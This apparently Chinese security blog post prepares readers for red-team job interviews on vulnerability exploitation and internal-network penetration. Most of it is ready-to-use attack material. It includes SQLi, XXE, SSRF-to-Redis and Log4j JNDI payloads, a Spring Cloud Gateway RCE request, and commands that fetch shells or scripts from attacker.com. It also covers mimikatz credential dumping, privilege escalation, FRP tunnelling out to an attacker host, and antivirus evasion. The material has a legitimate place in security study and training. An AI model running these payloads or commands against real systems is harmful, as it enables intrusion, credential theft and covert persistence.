安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。
目录
[🔍 漏洞挖掘深度指南](#🔍 漏洞挖掘深度指南)
[1. 简历通用漏洞实战要点(Top 5重点洞)](#1. 简历通用漏洞实战要点(Top 5重点洞))
[2. 漏洞利用研究核心逻辑](#2. 漏洞利用研究核心逻辑)
[3. 经典利用案例](#3. 经典利用案例)
[⚔️ 内网渗透实战突破](#⚔️ 内网渗透实战突破)
[1. Disable Function绕过(PHP场景)](#1. Disable Function绕过(PHP场景))
[2. Webshell提权路径](#2. Webshell提权路径)
[3. 内网渗透路线图](#3. 内网渗透路线图)
[4. 无扫描横向方案](#4. 无扫描横向方案)
[5. 无文件落地绕过杀软](#5. 无文件落地绕过杀软)
[6. 常用提权姿势速查表](#6. 常用提权姿势速查表)
[7. 内网代理之FRP高阶用法](#7. 内网代理之FRP高阶用法)
[💡 2025攻防新趋势](#💡 2025攻防新趋势)
## 漏洞挖掘(重点关注) 1. 简历上的通用洞挨个问 2. 漏洞利用研究的理解 3. 漏洞利用研究的案例 ## 内网(偏实战问题) 1. disable function bypass 2. webshell 提权(低权限 -> 高权限) 3. 已经拿到webshell,说说你的内网思路 4. 不允许扫描,如何横向 5. 存在杀软,不允许exe落地,怎么办 6. 常用的提权姿势 7. 内网代理,详细问了frp🔍 漏洞挖掘深度指南
1. 简历通用漏洞实战要点(Top 5重点洞)
漏洞类型 攻击手法 绕过技巧 SQL注入 时间盲注 SLEEP(2)+ 堆叠查询;EXEC xp_cmdshell绕WAF: /**/注释、0xHEX编码RCE 命令拼接: &/`(Win)、;`(Linux)XXE 外部实体注入: <!ENTITY xxe SYSTEM "file:///etc/passwd">协议限制绕过: php://filter/convert.base64-encode/resource=/etc/passwdSSRF Gopher协议攻击Redis: gopher://127.0.0.1:6379/_*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$1%0d%0a%0a%0aconfig set dir /tmp%0aquitDNS重绑定( rbndr.us服务)反序列化 利用 __wakeup()触发文件写入字符逃逸:构造不匹配的 { }数量📌 案例:2024年某OA系统RCE(CVE-2024-XXXX)
- 利用链:
JSON.parse()→JNDI注入 →ldap://加载恶意类- 绕过:
jndi:ldap://127.0.0.1#.evil.com/Exploit(利用#分割域名)2. 漏洞利用研究核心逻辑
mermaid`graph LR A[漏洞触发点] --> B[环境约束分析] B --> C[防护绕过设计] C --> D[稳定Exploit构造] D --> E[隐蔽性强化]`
- 关键维度 :
- 内存破坏类:ASLR/PIE绕过(Bruteforce地址)、ROP链构造
- Web类:WAF规则逃逸(非常规HTTP头
X-Forwarded-For: 127.0.0.1)- 沙箱逃逸:检测进程树(
ps -ef)、挂载点(/proc/self/mounts)3. 经典利用案例
- Log4j2 JNDI注入(CVE-2021-44228)
- Payload:
${jndi:ldap://attacker.com/Exploit}- 绕过技巧:
${${lower:j}ndi}(WAF规则规避)- Spring Cloud Gateway RCE(CVE-2022-22947)
利用步骤:
http`POST /actuator/gateway/routes/hacktest HTTP/1.1 {"filters":[{"name":"AddResponseHeader","args":{"name":"Result","value":"#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(\"id\").getInputStream()))}"}}],"uri":"http://example.com"} `
⚔️ 内网渗透实战突破
1. Disable Function绕过(PHP场景)
绕过方式 适用条件 操作命令 LD_PRELOAD劫持 存在 putenv()利用代码 FFI扩展 PHP ≥7.4 + 启用FFI FFI::cdef('int system(char *cmd);')->system('id');ImageMagick漏洞 存在图片处理功能 push graphic-context; execute 'curl attacker.com/shell.sh';2. Webshell提权路径
mermaid`graph TB A[低权限Shell] --> B{系统识别} B -->|Linux| C[/SUID提权/ Cron任务劫持] B -->|Windows| D[服务路径空格提权/ DLL劫持] C --> E[内核漏洞:DirtyPipe(CVE-2022-0847)] D --> F[令牌窃取:Incognito.exe] `3. 内网渗透路线图
✅ 已获Webshell → 信息收集 → 权限提升 → 横向移动 → 持久化
- 信息收集
- 网络拓扑:
arp -a(Win)、ip route(Linux)- 凭证提取:
mimikatz.exe sekurlsa::logonpasswords(Win)、/etc/shadow(Linux)- 横向移动
- 明文凭证 → PTH攻击(
psexec.py)- 无凭证 → IPv6路由欺骗(mitm6工具)
4. 无扫描横向方案
基于日志的探测 :
bash`# 利用Apache日志定位内网IP cat /var/log/apache2/access.log | grep -Po '10\.\d+\.\d+\.\d+' | sort -u `DNS隧道探测 :
bash`for i in {1..254}; do dig @192.168.1.$i test.com; done `SMB匿名连接 :
smbclient -L //192.168.1.1 -N5. 无文件落地绕过杀软
PowerShell内存加载 :
powershell`IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/PowerView.ps1') `Windows自带工具利用 :
执行Base64编码的exe:
cmd`certutil -decode payload.b64 payload.exe & start payload.exe `Linux进程注入 :
bash`perl -e 'use MIME::Base64; eval(decode_base64("c3lzdGVtKCJpZCIpOw=="))'`6. 常用提权姿势速查表
系统 提权方式 工具/EXP Windows 服务路径空格 AccessChk.exe + MSI安装包劫持 JuicyPotato(CLSID劫持) JuicyPotato Linux SUID滥用 find / -perm -4000 2>/dev/nullCapability提权 getcap -r / 2>/dev/null7. 内网代理之FRP高阶用法
穿透架构:
[攻击机] ←公网→ [FRPS:7000] ←内网→ [Webshell:8080 → FRPC] → 内网目标关键配置:
ini`# frpc.ini (Webshell侧) [common] server_addr = attacker.com server_port = 7000 [proxies] type = tcp local_ip = 192.168.1.100 # 目标内网IP local_port = 3389 # 目标端口 remote_port = 6000 # 公网映射端口 `流量隐匿:
- 加密:
protocol = kcp+tls_enable = true- 混淆:
vhost_http_port伪装成Web流量
💡 2025攻防新趋势
- AI对抗 :
- 使用GAN生成免杀Shellcode(如DeepCobra 项目)
- 硬件层攻击 :
- Intel CET绕过(基于分支历史注入)
- 云原生渗透 :
- Kubernetes RBAC权限逃逸(
kubectl create token --bound-object-kind)⚠️ 注:以上技术需在授权环境下测试,部分工具需自行编译规避AV检测(如使用garble 混淆Go程序)。